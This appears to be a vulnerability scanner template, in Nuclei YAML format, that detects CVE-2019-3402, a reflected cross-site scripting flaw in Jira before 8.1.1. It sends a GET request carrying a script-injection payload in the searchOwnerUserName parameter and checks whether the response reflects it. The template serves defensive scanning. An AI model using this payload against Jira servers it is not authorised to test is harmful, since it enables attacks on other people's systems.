52 lines
1.6 KiB
YAML
52 lines
1.6 KiB
YAML
id: CVE-2019-3402
|
|
|
|
info:
|
|
name: Jira < 8.1.1 - Cross-Site Scripting
|
|
author: pdteam
|
|
severity: medium
|
|
description: |
|
|
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
|
|
remediation: |
|
|
Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
|
|
- https://jira.atlassian.com/browse/JRASERVER-69243
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-3402
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-3402
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00254
|
|
epss-percentile: 0.62993
|
|
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: atlassian
|
|
product: jira
|
|
shodan-query: http.component:"Atlassian Jira"
|
|
tags: cve,cve2019,atlassian,jira,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "'<script>alert(1)</script>' does not exist"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100f234f7c2409a77a6f7e672a389e85e589e83f7378aea2d6f27cdc7fd01efaba5022100b76acfe71cb629ac2e26e547f7ced7df4aa3e8592120d41f0f9d42039bd75099:922c64590222798bb761d5b6d8e72950 |